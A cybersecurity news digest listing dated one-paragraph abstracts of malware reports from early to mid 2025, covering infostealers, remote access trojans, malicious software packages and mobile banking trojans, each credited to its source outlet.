Malware
June 11, 2025
Rust-based Myth Stealer Malware Spread via Fake Gaming Sites Targets Chrome, Firefox Users Full Text
Abstract
Cybersecurity researchers have identified a new Rust-based information stealer named Myth Stealer, distributed via fraudulent gaming websites and cracked software. The malware targets Chromium and Gecko-based browsers.The Hacker News
June 7, 2025
New Rust-Developed InfoStealer Drains Sensitive Data from Chromium-Based Browsers Full Text
Abstract
A newly discovered Rust-based malware, dubbed RustStealer, poses a significant threat to users of Chromium-based browsers like Google Chrome and Microsoft Edge. It extracts sensitive data such as login credentials, cookies, and browsing history.GBHackers
June 5, 2025
Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine Full Text
Abstract
Researchers observed the deployment of PathWiper via a legitimate endpoint administration framework. The attackers likely had access to the admin console, which was used to push both the VBScript and the PathWiper executable to the endpoints.Talos Intelligence
June 5, 2025
Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads Full Text
Abstract
A new variant of the Chaos RAT, an open-source remote access trojan written in Golang and inspired by frameworks like Cobalt Strike and Sliver, is actively targeting both Windows and Linux systems.The Hacker News
June 5, 2025
What 17,845 GitHub Repos Taught Us About Malicious MCP Servers Full Text
Abstract
A recent audit of nearly 18,000 Model Context Protocol (MCP) servers on GitHub revealed that 1,408 repositories may have been intentionally designed for malicious purposes.Virus Total
June 3, 2025
Android malware Crocodilus adds fake contacts to spoof trusted callers Full Text
Abstract
Crocodilus, a sophisticated Android malware, has evolved with new social engineering and evasion techniques. Initially observed in Turkey, it has now expanded globally, targeting users across all continents.Bleeping Computer
June 3, 2025
Malicious NPM Packages Exploit Ethereum Wallets with Obfuscated JavaScript Full Text
Abstract
A new malware campaign is exploiting the NPM ecosystem to target Ethereum wallet users by distributing malicious packages with advanced JavaScript obfuscation techniques.GBHackers
June 2, 2025
Acreed Emerges as Dominant Infostealer Threat Following Lumma Takedown Full Text
Abstract
Acreed, a new infostealer malware strain, has rapidly risen to prominence in the cybercriminal ecosystem following the global takedown of Lumma Stealer (LummaC2) in May 2025.Infosecurity Magazine
June 2, 2025
Hackers Weaponize Free SSH Client PuTTY to Deliver Malware on Windows Full Text
Abstract
A new malware campaign exploits OpenSSH, which has been a default component in Windows since version 1803, to establish stealthy and persistent access on compromised systems.GBHackers
May 29, 2025
New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers Full Text
Abstract
A newly discovered Remote Access Trojan (RAT) targeting Windows systems employs corrupted DOS and PE headers to evade detection and hinder analysis. The malware was found running undetected for several weeks on a compromised host.The Hacker News
May 28, 2025
Zanubis Android Banking Trojan Evolves with Silent Installation and Credential Theft Capabilities Full Text
Abstract
Zanubis is a sophisticated Android banking Trojan active since 2022, targeting Peruvian financial institutions. It masquerades as legitimate apps to trick users into granting accessibility permissions, enabling full device control.Secure List
May 27, 2025
AppleProcessHub macOS Malware Steals Sensitive Data Using Advanced Evasion and C2 Techniques Full Text
Abstract
A newly identified macOS malware, AppleProcessHub, is actively targeting Apple systems to steal sensitive data. This sophisticated stealer demonstrates advanced evasion and persistence techniques, signaling a growing threat to macOS environments.Kandji
May 27, 2025
GhostSpy Android Malware Grants Full Device Control and Evades Detection Full Text
Abstract
GhostSpy is a newly identified Android malware that poses a severe threat to mobile security by granting attackers full control over infected devices. It employs advanced evasion, persistence, and surveillance techniques.Cyfirma
May 27, 2025
SilverRAT Remote Access Trojan Source Code Leaked on GitHub Full Text
Abstract
The full source code of SilverRAT was briefly leaked on GitHub under the repository “SilverRAT-FULL-Source-Code” before being swiftly removed. The leak included complete build instructions, Visual Studio solution files, and a READMEHackRead
May 26, 2025
De-obfuscating ALCATRAZ Full Text
Abstract
Elastic Security Labs identified a new malware family called DOUBLELOADER, which uses the ALCATRAZ obfuscator for evasion and pairs with the RHADAMANTHYS infostealer. DOUBLELOADER employs multiple obfuscation techniques such as LEA obfuscation.Elastic
May 26, 2025
Case of Larva-25004 Group (Related to Kimsuky) Exploiting Additional Certificate - Malware Signed with Nexaweb Certificate - ASEC Full Text
Abstract
ASEC has discovered malware signed with the certification of Nexaweb Inc. by investigating a file with the same characteristics as the one signed with a Korean company’s certificate.AhnLab
May 22, 2025
AI-Generated TikTok Videos Used to Distribute Infostealer Malware Full Text
Abstract
A new campaign is exploiting TikTok’s vast user base and viral content model to distribute information-stealing malware, including Vidar and StealC. It uses AI-generated videos to socially engineer users into executing malicious PowerShell commands.Infosecurity Magazine
May 20, 2025
Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts Full Text
Abstract
Researchers identified several malicious packages on PyPI and npm that exploit APIs and implant backdoors. checker-SaGaF (2,605 downloads) steinlurks (1,049 downloads) sinnercore (3,300 downloads) dbgpkg (~350 downloads) requestsdev (76 downloads)The Hacker News
May 20, 2025
Malicious Koishi Chatbot Plugin Exfiltrates Messages Trigger… Full Text
Abstract
A malicious npm package, koishi-plugin-pinhaofa, is targeting Koishi chatbot frameworks. Disguised as a spelling autocorrect plugin, it embeds a backdoor that exfiltrates messages containing 8-character hexadecimal strings to a hardcoded QQ account.Socket
May 16, 2025
Printer company provided infected software downloads for half a year Full Text
Abstract
This investigation revealed that the vendor's official software downloads were infected with multiple strains of malware, including the XRed backdoor and a new clipbanker virus called SnipVex.Cyware
May 15, 2025
Malicious npm Package Leverages Unicode Steganography, Google Calendar as C2 Dropper Full Text
Abstract
A newly discovered malicious npm package, os-info-checker-es6, masquerades as a utility for retrieving OS information but is designed to stealthily deliver a next-stage payload.The Hacker News
May 15, 2025
TransferLoader Malware Loader Deploys Morpheus Ransomware Using Obfuscated Backdoor and IPFS-Based C2 Full Text
Abstract
TransferLoader is a newly identified malware loader active since at least February 2025. It comprises three main components—a downloader, a backdoor loader, and a backdoor—each employing advanced anti-analysis and obfuscation techniques.ZScaler
May 15, 2025
Researchers Uncover Malicious .desktop File Campaign Targeting Linux Systems Full Text
Abstract
Researchers have identified a surge in malicious `.desktop` files targeting Linux systems. These files exploit standard desktop behaviors to execute hidden commands and download malware.Google Cloud Community
May 14, 2025
Katz Stealer Malware Hits 78+ Chromium and Gecko-Based Browsers Full Text
Abstract
Katz Stealer is a newly identified infostealer malware targeting over 78 Chromium and Gecko-based browser variants. It is capable of extracting sensitive data including credentials, cookies, CVV2 codes, OAuth tokens, and cryptocurrency wallets.GBHackers
May 14, 2025
DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt Full Text
Abstract
DarkCloud Stealer is a sophisticated infostealer malware active since 2022 and advertised on hacking forums as early as January 2023. It has been used in targeted attacks against government organizations.Palo Alto Networks
May 13, 2025
Unpacking PyInstaller Malware on macOS Full Text
Abstract
A newly discovered macOS infostealer leverages PyInstaller, an open-source Python bundler, to deploy malicious Mach-O binaries. The malware bypasses traditional detection mechanisms and supports both x86_64 and arm64 architectures.JAMF
May 13, 2025
Chihuahua Stealer: A new Breed of Infostealer Full Text
Abstract
Chihuahua Stealer is a newly identified .NET-based infostealer that employs a multi-stage infection chain, advanced obfuscation, and stealth techniques to exfiltrate sensitive browser and cryptocurrency wallet data.GData Software
May 12, 2025
“PupkinStealer” – .NET Malware Steals Browser Data and Exfiltrates via Telegram Full Text
Abstract
A newly identified .NET-based infostealer named PupkinStealer has emerged as a significant threat targeting Windows systems. First observed in April 2025, this malware is designed to harvest sensitive data.GBHackers
May 9, 2025
Stealthy .NET Malware: Hiding Malicious Payloads as Bitmap Resources Full Text
Abstract
A recent malware campaign leverages steganography to embed malicious payloads within bitmap resources of 32-bit .NET applications. These payloads are delivered via malspam targeting the financial sector in Türkiye and the logistics sector in Asia.Palo Alto Networks
May 7, 2025
Lampion Is Back With ClickFix Lures Full Text
Abstract
A newly uncovered campaign by the Lampion banking malware group has targeted Portuguese organizations in the government, finance, and transportation sectors. Lampion is an info stealer known for stealing sensitive banking credentials.Palo Alto Networks
May 7, 2025
Malicious PyPI Package Targets Discord Developers with Remot… Full Text
Abstract
A malicious Python package named discordpydebug was uploaded to PyPI, posing as a debugging tool for Discord bot developers. Despite lacking a README or documentation, it was downloaded over 11,000 times.Socket
May 5, 2025
StealC V2: ThreatLabz Unveils the Evolution of a Stealthy Info-Stealer and Malware Loader Full Text
Abstract
StealC V2, introduced in March 2025, utilizes a JSON-based network protocol with RC4 encryption implemented in recent variants. StealC V2 supports loader options that can deliver Microsoft Software Installer (MSI) packages, and PowerShell scripts.Security Online
April 30, 2025
New Gremlin Infostealer Distributed on Telegram Full Text
Abstract
Gremlin Stealer is a newly identified C#-based infostealer malware actively promoted on Telegram since March 2025. It targets Windows systems and is capable of harvesting a broad range of sensitive data.Infosecurity Magazine
April 30, 2025
Yet Another NodeJS Backdoor (YaNB): A Modern Challenge Full Text
Abstract
Trustwave SpiderLabs uncovered a resurgence of malicious campaigns in March 2025 that exploit deceptive CAPTCHA verifications to deploy NodeJS-based backdoors. The campaign is referred to as "Yet Another NodeJS Backdoor (YANB)."TrustWave
April 30, 2025
In Plain Sight: Uncovering SuperShell & Cobalt Strike from an Open Directory Full Text
Abstract
Hunt researchers uncovered a malicious server, revealing SuperShell C2 payloads and a Linux ELF Cobalt Strike beacon. The server also hosted reconnaissance tools, highlighting the sophistication and layered nature of modern cyber threats.Hunt
April 29, 2025
Technical Malware Analysis Report: Python-based RAT Malware Full Text
Abstract
A newly discovered Python-based Remote Access Trojan (RAT) leverages Discord as its command-and-control (C2) platform, transforming the popular communication tool into a hub for malicious operations.Cyfirma
April 29, 2025
HANNIBAL Stealer: A Rebranded Threat Born from Sharp and TX Lineage - CYFIRMA Full Text
Abstract
Hannibal Stealer is a newly surfaced malware, identified as a cracked and rebranded variant of the Sharp and TX stealers, promoted by the reverse engineering group ‘llcppc_reverse.’Cyfirma
April 25, 2025
Chrome Extension Uses AI Engine to Act Without User Input Full Text
Abstract
Security researchers from ExtensionTotal have discovered a Chrome extension capable of interacting with local Model Context Protocol (MCP) servers without user permission or detection by Chrome’s security mechanisms.Infosecurity Magazine
April 24, 2025
DslogdRAT Malware Installed in Ivanti Connect Secure - JPCERT/CC Eyes Full Text
Abstract
A new malware, DslogdRAT, was deployed via a zero-day vulnerability in Ivanti Connect Secure during targeted attacks in Japan. The malware was installed using a Perl-based CGI web shell and exhibits advanced command-and-control capabilities.JPCert
April 22, 2025
New Malware Mimics Cisco Webex to Target Users in-the-Wild Full Text
Abstract
According to researchers, the attack begins when victims are persuaded to click on malicious meeting links that exploit a vulnerability in Cisco Webex App’s custom URL parser.Cybersecurity News
April 21, 2025
Hackers Claim to Sell ‘Baldwin Killer’ Malware That Evades AV and EDR Full Text
Abstract
A notorious threat actor has allegedly begun selling “Baldwin Killer,” a sophisticated malware toolkit designed to bypass leading antivirus (AV) and endpoint detection and response (EDR) systems.GBHackers
April 21, 2025
New Android malware steals your credit cards for NFC relay attacks Full Text
Abstract
A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data.Bleeping Computer
April 19, 2025
New payment-card scam involves a phone call, some malware and a personal tap Full Text
Abstract
A new fraud campaign tracked by Cleafy in Italy leverages Android malware, social engineering, and NFC technology to steal payment card data. The malware, dubbed SuperCard X, is part of a malware-as-a-service (MaaS) operation .The Record
April 19, 2025
KeyPlug Malware Server Leak Exposes Fortinet Firewall and VPN Exploitation Tools Full Text
Abstract
Cybersecurity researchers uncovered a RedGolf/APT41 server inadvertently exposed for less than 24 hours, offering a rare glimpse into an active staging ground used by the threat actor.GBHackers
April 18, 2025
npm Malware Targets Telegram Bot Developers with Persistent … Full Text
Abstract
A new supply chain attack has been uncovered targeting Telegram bot developers via typosquatted npm packages. These malicious packages mimic the legitimate `node-telegram-bot-api` library.Socket
April 17, 2025
Unmasking the new XorDDoS controller and infrastructure Full Text
Abstract
Cisco Talos observed an existing DDoS malware known as XorDDoS, continuing to spread globally between November 2023 and February 2025. A significant finding shows that over 70 percent of attacks using XorDDoS targeted the U.S.Talos
April 17, 2025
Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure Full Text
Abstract
Researchers unearthed the PteroLNK variant used by the Russian-nexus threat group, Gamaredon. The group targets Ukrainian entities, focusing on government, military, and critical infrastructure sectors.Harfang Lab
April 16, 2025
Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users Full Text
Abstract
Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and Telegram that contain cryptocurrency clipper functionality as part of a campaign since June 2024.The Hacker News
April 16, 2025
New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks Full Text
Abstract
Researchers unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt in 2024.The Hacker News
April 16, 2025
Malicious PyPI Package Targets MEXC Trading API to Steal Credentials and Redirect Orders Full Text
Abstract
Cybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that's designed to reroute trading orders placed on the MEXC cryptocurrency exchange to a malicious server and steal tokens.The Hacker News
April 15, 2025
PasivRobber Malware Emerges, Targeting macOS to Steal Data From Systems and Apps Full Text
Abstract
Identified on March 13, 2025, after a suspicious file named “wsus” was uploaded to VirusTotal, PasivRobber is a multi-component threat designed to steal a wide range of data from infected systems and popular applications.GBHackers
April 15, 2025
Unmasking Xworm Payload Execution Path through Jailbreaking a Malicious JScript Loader Full Text
Abstract
Security researchers are analyzing a sophisticated malware delivery mechanism that uses a JScript loader to deploy different payloads based on the victim’s geographic location.GBHackers
April 15, 2025
TROX Stealer: A deep dive into a new Malware as a Service (MaaS) attack campaign Full Text
Abstract
TROX Stealer, first seen by Sublime Security in December 2024, appears to be an obscure and undocumented information stealer with capabilities to exfiltrate sensitive data.Sublime
April 10, 2025
Atomic and Exodus Crypto Wallets Targeted in Malicious NPM Package Campaign Full Text
Abstract
The new NPM package, pdf-to-office, masquerades as a utility for converting PDF files to Word documents. Instead, it injects malicious code into cryptocurrency wallet software associated with Atomic Wallet and Exodus.Reversing Labs
April 5, 2025
Lazarus Expands Contagious Interview Campaign With 11 New NPM Packages Containing Malware Loaders and Bitbucket Payloads Full Text
Abstract
These latest malware samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation in the threat actors’ obfuscation techniques.Socket
March 31, 2025
Researchers Uncover the Shelby Malware Family Abusing GitHub for Command and Control Full Text
Abstract
Researchers found unused code and dynamic payload loading, hinting at the malware being under active development, indicating future updates may address any issues with contemporary versions.Elastic
March 31, 2025
Python-based RAT Abuses Discord API to Execute Data Theft Attacks Full Text
Abstract
The Python-based Discord Remote Access Trojan (RAT) leverages Discord’s API as a C2 server to execute arbitrary system commands, steal sensitive information, capture screenshots, and manipulate both local machines and Discord servers.Cyfirma
March 31, 2025
Python-based Triton RAT Found Targeting Roblox Credentials Full Text
Abstract
Cado Security Labs identified a Python Remote Access Tool (RAT) named Triton RAT. The open source RAT is available on GitHub and allows users to remotely access and control a system using Telegram.Cado Security
March 31, 2025
New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials Full Text
Abstract
As with other banking trojans of its kind, the malware is designed to facilitate device takeover (DTO) and ultimately conduct fraudulent transactions. An analysis of the source code and the debug messages revealed that the author is Turkish-speaking.The Hacker News
March 29, 2025
Stealthy Snake Keylogger Malware Targets Credentials in Sophisticated Attacks Full Text
Abstract
A new report from Seqrite Labs detailed a malicious campaign employing SnakeKeylogger, an info-stealing malware known for its advanced techniques and ability to evade detection.Security Online
March 28, 2025
PJobRAT Makes a Comeback, Takes Another Crack at Chat Apps Full Text
Abstract
In the latest campaign, Sophos X-Ops researchers found PJobRAT samples disguising themselves as instant messaging apps. As per their telemetry, all the victims appeared to be based in Taiwan.Sophos
March 27, 2025
Malware Found on npm Infecting Local Package With Reverse Shell Full Text
Abstract
In March, two harmful packages called ethers-provider2 and ethers-providerz were added to npm. They hid their malicious payload and modified the legitimate npm package ethers, which led to a reverse shell.Reversing Labs
March 27, 2025
MacOS Malware ReaderUpdate Adds New Variants Written in Crystal, Nim, Rust, and Go Full Text
Abstract
The ReaderUpdate malware, which previously went relatively unnoticed, now includes variants written in Crystal, Nim, Rust, and most recently, Go, in addition to the original compiled Python binary.Sentinel One
March 26, 2025
Hackers Using E-Crime Tool Atlantis AIO for Credential Stuffing on Over 140 Platforms Full Text
Abstract
Atlantis AIO offers threat actors the ability to launch credential stuffing attacks at scale via pre-configured modules for targeting a range of platforms and cloud-based services, thereby facilitating fraud, data theft, and account takeovers.The Hacker News
March 25, 2025
New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI Full Text
Abstract
The McAfee Mobile Research Team discovered malware campaigns abusing .NET MAUI, a cross-platform development framework, to evade detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information.March 25, 2025
Rilide Stealer Disguises as a Browser Extension to Steal Crypto Full Text
Abstract
Pulsedive Threat Research identified multiple delivery mechanisms used to distribute Rilide. Phishing websites are the most common method, but newer versions have been adapted to work with Chrome Extension Manifest V3.Security Online
March 25, 2025
AMOS Stealer Revamped to Serve as a Fully Undetected macOS Threat Full Text
Abstract
The malware is distributed via a DMG file named Installer_v2.7.8.dmg, leveraging a clever trick to bypass macOS Gatekeeper. Victims are instructed to right-click and select “Open,” sidestepping Apple’s verification mechanism.Security Online
March 24, 2025
Microsoft Trusted Signing service abused to code-sign malware Full Text
Abstract
Signed malware has the advantage of potentially bypassing security filters that would normally block unsigned executable files, or at least treat them with less suspicion.Bleeping Computer
March 22, 2025
Steam Pulls Game Demo Infecting Windows With Info-Stealing Malware Full Text
Abstract
Valve has removed from its Steam store the game title 'Sniper: Phantom's Resolution' following multiple users reporting that the demo installer infected their systems with information stealing malware.Bleeping Computer
March 20, 2025
New Arcane Info-stealer Infects YouTube, Discord Users via Game Cheats Full Text
Abstract
The campaign distributing Arcane Stealer relies on YouTube videos promoting game cheats and cracks, tricking users into following a link to download a password-protected archive.Bleeping Computer
March 19, 2025
FIN7’s New Stealth Weapon, Anubis Backdoor, Emerges in the Wild Full Text
Abstract
The Anubis Backdoor is designed to provide attackers with full control over infected machines, employing evasion techniques to bypass traditional security measures. It allows attackers to execute remote shell commands and various system operations.Security Online
March 19, 2025
New ‘Rules File Backdoor’ Attack Lets Hackers Inject Malicious Code via AI Code Editors Full Text
Abstract
Cybersecurity researchers have disclosed details of a new supply chain attack vector dubbed Rules File Backdoor that affects AI-powered code editors like GitHub Copilot and Cursor, causing them to inject malicious code.The Hacker News
March 18, 2025
Microsoft Warns of New StilachiRAT Malware Used for Crypto Theft, Reconnaissance Full Text
Abstract
While the malware (dubbed StilachiRAT) hasn't yet reached widespread distribution, Microsoft says it decided to publicly share indicators of compromise and mitigation guidance to help network defenders detect this threat and reduce its impact.Bleeping Computer
March 15, 2025
Fake CAPTCHA Malware Exploits Windows Users to Run PowerShell Commands Full Text
Abstract
The attack chain comprises several stages in which attackers use a deceptive fake CAPTCHA prompt to trick users into executing a malicious PowerShell command, making it appear as a legitimate part of the verification process.GBHackers
March 14, 2025
JSPSpy Combined With Custom File Management Tool in Webshell Infrastructure Full Text
Abstract
Hunt researchers recently identified a cluster of JSPSpy web shell servers with an unexpected addition: Filebroser, a rebranded version of the open-source File Browser file management project.Hunt
March 14, 2025
New Sobolan Malware Campaign Targets Jupyter Notebooks and Cloud-Native Environments Full Text
Abstract
The Sobolan malware campaign utilizes a multi-stage attack chain to infiltrate and compromise systems, deploying cryptominers and establishing persistent backdoors for long-term control.Security Online
March 13, 2025
DCRat Malware Exploits YouTube to Hijack User Credentials Full Text
Abstract
Analysts have identified 34 different plugins associated with DCRat, enabling dangerous functionalities such as keystroke logging, webcam access, file theft, and password exfiltration.Cyber Press
March 12, 2025
Fake Binance Wallet Email Promises TRUMP Coin, Installs Malware Full Text
Abstract
The phishing emails, sent under the name “Binance,” urge recipients to claim newly launched Trump-themed cryptocurrency. A link directs users to a counterfeit Binance website that mimics official branding.HackRead
March 12, 2025
PlayPraetor Malware Targets Android Users via Fake Play Store Apps to Steal Passwords Full Text
Abstract
The primary motive behind these attacks is financial gain. Threat actors exploit stolen data by draining funds from compromised accounts, making unauthorized transactions, or selling the accounts on dark web marketplaces.GBHackers
March 11, 2025
Fortinet Identifies Malicious Packages in the Wild: Insights and Trends from November 2024 Onward Full Text
Abstract
1,082 packages employed minimal code within a low file count, around 1,052 packages utilized suspicious installation scripts, 1,043 instances lacked repository URLs, and 974 packages contained suspicious URLs for C2 servers communication.Fortinet
March 11, 2025
Phantom Goblin Malware: Stealthy Attacks via VSCode Tunnels Full Text
Abstract
A new malware campaign, dubbed Phantom Goblin, has been uncovered. This attack uses social engineering tactics to trick victims into executing a malicious LNK file, initiating a multi-stage attack aimed at stealing browser credentials.Security Online
March 11, 2025
A Deep Dive into Strela Stealer and how it Targets European Countries Full Text
Abstract
The Strela Stealer is an infostealer that exfiltrates email log-in credentials and has been in the wild since late 2022. It is a precisely focused malware, targeting Mozilla Thunderbird and Microsoft Outlook on systems in chosen European countries.TrustWave
March 10, 2025
FIN7, FIN8, and Others Use Ragnar Loader for Persistent Access and Ransomware Operations Full Text
Abstract
Threat hunters have shed light on a "sophisticated and evolving malware toolkit" called Ragnar Loader that's used by various cybercrime and ransomware groups like Ragnar Locker (aka Monstrous Mantis), FIN7, FIN8, and Ruthless Mantis (ex-REvil).The Hacker News
March 8, 2025
Malicious Chrome Extensions Can Spoof Password Managers in New Attack Full Text
Abstract
A newly devised "polymorphic" attack allows malicious Chrome extensions to morph into other browser extensions, including password managers, crypto wallets, and banking apps, to steal sensitive information.Bleeping Computer
March 8, 2025
Cybercriminals Exploit YouTubers to Spread SilentCryptoMiner on Windows Systems Full Text
Abstract
SilentCryptoMiner, based on the open-source XMRig miner, is capable of mining multiple cryptocurrencies using various algorithms. It employs process hollowing techniques to inject miner code into system processes for stealth.GBHackers
March 5, 2025
Lumma Stealer Expands Attack Surface with Fake Booking Sites and CAPTCHA Tricks Full Text
Abstract
The campaign’s infection chain was first detected in early 2025, targeting users booking trips to Palawan, Philippines. Within a week, the attack vector shifted to a hotel in Munich, Germany, indicating a broader global focus on travel-related sites.Security Online
March 1, 2025
New Malware Campaign Uses Fake “Mods” and “Cracks” to Steal User Data Full Text
Abstract
A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting.GBHackers
February 28, 2025
Fake WordPress Plugin Impacts SEO by Injecting Casino Spam Full Text
Abstract
The attackers used multiple stealthy methods to evade detection: naming the plugin an innocent-sounding name, and hiding it in the WordPress plugins directory versus a core file to avoid being found by integrity checks.Sucuri
February 28, 2025
VSCode Extensions With 9 Million Installs Pulled Over Security Risks Full Text
Abstract
Microsoft has removed two popular VSCode extensions, 'Material Theme – Free' and 'Material Theme Icons – Free,' from the Visual Studio Marketplace for allegedly containing malicious code.Bleeping Computer
February 26, 2025
New Auto-Color Linux Backdoor Targets North American Governments, Universities Full Text
Abstract
A previously undocumented Linux backdoor dubbed 'Auto-Color' was observed in attacks between November and December 2024, targeting universities and government organizations in North America and Asia.Bleeping Computer
February 24, 2025
New Zhong Stealer Malware Exploits Zendesk to Attack Fintech and Cryptocurrency Industries Full Text
Abstract
The attackers masquerade as customers, leveraging social engineering tactics to trick support agents into downloading malicious files. The attack begins with the creation of fraudulent support tickets by attackers using newly registered accounts. GBHackers
February 24, 2025
Null-AMSI Bypasses Security Measures to Deploy AsyncRAT Payload Full Text
Abstract
Once the AsyncRAT payload is loaded, it establishes control over the victim’s system, allowing the attacker to remotely control the machine, steal data, install additional malware, or launch further attacks. The Cyber Express
February 24, 2025
GhostSocks - Lumma’s Partner in Proxy Full Text
Abstract
GhostSocks, a Golang-based SOCKS5 backconnect proxy malware, was first identified in October 2023 when it was advertised on a Russian-language criminal forum, and supports Microsoft Windows alongside Linux. Infrawatch
February 22, 2025
SpyLend Android malware downloaded 100,000 times from Google Play Full Text
Abstract
An Android malware app called SpyLend has been downloaded over 100,000 times from Google Play, where it masqueraded as a financial tool but became a predatory loan app for those in India. Bleeping Computer
February 20, 2025
New FrigidStealer Malware Infects Macs via Fake Browser Updates Full Text
Abstract
FrigidStealer is a Go-based malware built with the WailsIO framework to make the installer appear legitimate during infection. The malware extracts saved cookies, login credentials, and password-related files stored in Safari or Chrome on macOS. Bleeping Computer
February 20, 2025
Rhadamanthys Stealer Being Distributed Through MSC Files Full Text
Abstract
The malicious MSC file is often disguised as a harmless document, such as a Word file. When the victim opens the file, it downloads and executes a PowerShell script from an external server. This script then decodes and runs the Rhadamanthys Stealer. ASEC
February 20, 2025
Malicious Signal, Line, and Gmail Installers Target Chinese-Speaking Users with Backdoors Full Text
Abstract
The attackers rely on search engine optimization (SEO) poisoning to direct users to fraudulent download pages for apps like Signal, Line, and Gmail, which deliver ZIP files containing executable malware. Hunt
February 20, 2025
Highly Obfuscated .NET sectopRAT Disguises as Chrome Extension Full Text
Abstract
Recently, cybersecurity researchers uncovered a new campaign where sectopRAT disguises itself as a legitimate Google Chrome extension named “Google Docs,” further amplifying its stealth and data-theft capabilities. GBHackers
February 18, 2025
Earth Preta Mixes Legitimate and Malicious Components to Sidestep Detection Full Text
Abstract
Earth Preta’s malware, a variant of the TONESHELL backdoor, is sideloaded with a legitimate Electronic Arts application and communicates with a command-and-control server for data exfiltration. Trend Micro
February 18, 2025
Microsoft Warns of New XCSSET macOS Malware Variant Used for Cryptocurrency Theft Full Text
Abstract
A new variant of the XCSSET macOS modular malware has emerged in attacks that target users' sensitive information, including digital wallets and data from the legitimate Notes app. Bleeping Computer
February 17, 2025
PirateFi game on Steam caught installing password-stealing malware Full Text
Abstract
A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users. Statistics on the title's page show that up to 1,500 individuals may be impacted. Bleeping Computer
February 13, 2025
Magento Credit Card Stealer Disguised in an Tag Full Text
Abstract
Analyzing the decoded version of the malicious script reveals that it first checks whether the user is on the checkout page and ensures the script hasn’t run yet in the current session. Sucuri
February 11, 2025
Malicious ML Models Discovered on Hugging Face Platform Full Text
Abstract
Researchers at ReversingLabs have discovered two malicious machine learning (ML) models available on Hugging Face, the leading hub for sharing AI models and applications. ReversingLabs
February 10, 2025
Flesh Stealer Snoops on Web Browsers and Cryptocurrency Wallets Full Text
Abstract
Flesh Stealer has been actively promoted on Discord, Telegram channels, and underground forums like Pyrex Guru. Employing Base64 obfuscation techniques to conceal its functions and strings, the stealer first emerged in August 2024. Cyfirma
February 6, 2025
New ValleyRAT Malware Variant Spreads via Fake Chrome Downloads Full Text
Abstract
Cybersecurity researchers at Morphisec Threat Lab discovered a new version of the sophisticated ValleyRAT malware distributed through various channels including phishing emails, instant messaging platforms, and compromised websites. HackRead
February 5, 2025
AsyncRAT Abusing Python and Cloudflare Tunnels for Stealthy Malware Delivery Full Text
Abstract
AsyncRAT, known for its asynchronous communication capabilities, enables attackers to control compromised systems, exfiltrate sensitive data, and execute commands undetected. GBHackers
February 4, 2025
Malicious Package Exploits Go Module Proxy Caching for Persistence Full Text
Abstract
Socket researchers discovered a malicious typosquat package in the Go ecosystem, impersonating the widely used BoltDB database module (github.com/boltdb/bolt), a tool trusted by many organizations including Shopify and Heroku. Socket
February 4, 2025
Fully Undetectable macOS Backdoor Called “Tiny FUD” Discovered Full Text
Abstract
This stealthy macOS malware leverages process name manipulation, DYLD injection, and C2-based command execution to operate undetected, making it a significant threat to Apple users. Security Online
February 4, 2025
DeepSeek AI Tools Impersonated by Info-Stealer Malware on PyPI Full Text
Abstract
According to Positive Technologies researchers who discovered the campaign and reported it to PyPI, the packages posing as Python clients for DeepSeek AI were infostealers that stole data from developers who utilized them. Bleeping Computer
January 31, 2025
Technical Analysis of Xloader Versions 6 and 7 Full Text
Abstract
Xloader is known for its ability to steal sensitive information from web browsers, email clients, and FTP applications, as well as deploy second-stage payloads on infected systems. Zscaler
January 20, 2025
Weaponized Software Targets Chinese-Speaking Organizations Full Text
Abstract
This campaign stands out due to its unique focus on Chinese-speaking victims and organizations across China, Hong Kong, and Taiwan. It demonstrates an attack that broadly targets one specific demographic. Intezer
January 18, 2025
Malicious PyPI Package ‘pycord-self’ Targets Discord Developers with Token Theft and Backdoor Exploit Full Text
Abstract
The malicious package, named pycord-self, mimics the legitimate discord.py-self library, a widely used Python wrapper for the Discord user API. The legitimate package was released on April 8, 2023, whereas the malicious one appeared on June 20, 2024. Socket
January 10, 2025
New Banshee Stealer Variant Bypasses Antivirus with Apple’s XProtect-Inspired Encryption Full Text
Abstract
Offered under a malware-as-a-service (MaaS) model to other cybercriminals for $3,000 a month, Banshee Stealer is capable of harvesting data from web browsers, cryptocurrency wallets, and files matching specific extensions. The Hacker News
January 10, 2025
Malicious npm Packages Target Solana Private Keys and Drain Victims’ Wallets Full Text
Abstract
The packages – @async-mutex/mutex, dexscreener, solana-transaction-toolkit, and solana-stable-web-huks – exploit typosquatting to deceive developers into downloading them. These packages steal sensitive data and drain victims’ wallets. Socket
January 6, 2025
Malicious Packages on npm, PyPI, and RubyGems Weaponize OAST Techniques for Data Exfiltration and Recon Full Text
Abstract
Over the last year, researchers at Socket observed and identified malicious packages leveraging Out-of-Band Application Security Testing (OAST) services such as oastify[.]com and oast[.]fun to exfiltrate sensitive data to attacker-controlled servers. Socket
January 6, 2025
NonEuclid RAT Combines Advanced Stealth, Anti-Detection, and Ransomware Capabilities Full Text
Abstract
Developed in C# for the .NET Framework 4.8, NonEuclid is built to evade detection and offers a suite of advanced capabilities, including ransomware encryption, privilege escalation, and anti-detection mechanisms. Cyfirma
January 4, 2025
Fake EditThisCookie Chrome Extension Steals User Data Full Text
Abstract
